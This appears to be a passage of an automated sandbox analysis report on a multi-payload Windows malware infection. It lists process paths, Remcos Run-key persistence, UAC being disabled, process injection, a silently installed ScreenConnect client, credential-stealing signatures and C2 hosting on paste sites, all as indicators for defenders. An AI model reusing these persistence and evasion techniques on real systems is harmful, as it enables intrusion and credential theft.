N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pyexec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Uses the VBS compiler for execution

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\AppData\Local\Temp\3188116601.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\Files\file.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\Files\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" C:\ProgramData\tst\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yjlwuuys = "C:\\Users\\Admin\\AppData\\Roaming\\Yjlwuuys.exe" C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" C:\Users\Admin\AppData\Local\Temp\2863614952.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\Files\leto.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monster Update Service = "C:\\Users\\Admin\\AppData\\Local\\MonsterUpdateService\\Monster.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" C:\ProgramData\tst\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Google\Chrome\updater.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\ARP.EXE N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800630031003300360030003600660065003900300030003900660031003100640029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2140 set thread context of 708 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 3252 set thread context of 4220 N/A C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
PID 944 set thread context of 3552 N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
PID 2180 set thread context of 2372 N/A C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe C:\Windows\System32\conhost.exe
PID 4376 set thread context of 4328 N/A C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe
PID 876 set thread context of 3524 N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe C:\Windows\System32\conhost.exe
PID 876 set thread context of 2028 N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe C:\Windows\System32\dwm.exe
PID 4168 set thread context of 1504 N/A C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
PID 2732 set thread context of 3576 N/A C:\ProgramData\Remcos\remcos.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 3556 set thread context of 5652 N/A C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe C:\Users\Admin\AppData\Local\Temp\svchost015.exe
PID 2628 set thread context of 5588 N/A C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe C:\Windows\SysWOW64\cmd.exe
PID 6076 set thread context of 4348 N/A C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3968 set thread context of 4412 N/A C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4996 set thread context of 5184 N/A C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe
PID 1680 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
PID 5776 set thread context of 5824 N/A C:\ProgramData\tst\remcos.exe \??\c:\program files (x86)\internet explorer\iexplore.exe
PID 3940 set thread context of 5992 N/A C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
PID 6732 set thread context of 6964 N/A C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe
PID 1764 set thread context of 7496 N/A C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 6392 set thread context of 6164 N/A C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5976 set thread context of 6660 N/A C:\ProgramData\axaso\bkujn.exe C:\ProgramData\axaso\bkujn.exe
PID 9188 set thread context of 6156 N/A C:\ProgramData\axaso\bkujn.exe C:\ProgramData\axaso\bkujn.exe
PID 6224 set thread context of 9176 N/A C:\ProgramData\axaso\bkujn.exe C:\ProgramData\axaso\bkujn.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\web.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\system.config C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e5f0299.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9BE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\CameroonBuses C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe N/A
File opened for modification C:\Windows\BackedIma C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe N/A
File created C:\Windows\Installer\{80530F48-9896-FE66-A2AB-CD9170769313}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\PossessDescriptions C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2863614952.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5f029b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe N/A
File created C:\Windows\Tasks\Hkbsse.job C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe N/A
File opened for modification C:\Windows\Installer\MSID69.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\ConsolidationDistinct C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe N/A
File created C:\Windows\Installer\e5f0299.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6CF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\FlickrRealm C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe N/A
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\ednfosi.job C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Files\injector.exe N/A
File created C:\Windows\Installer\SourceHash{80530F48-9896-FE66-A2AB-CD9170769313} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{80530F48-9896-FE66-A2AB-CD9170769313}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\3188116601.exe N/A
File opened for modification C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\3188116601.exe N/A
File opened for modification C:\Windows\Installer\{80530F48-9896-FE66-A2AB-CD9170769313}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\key.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
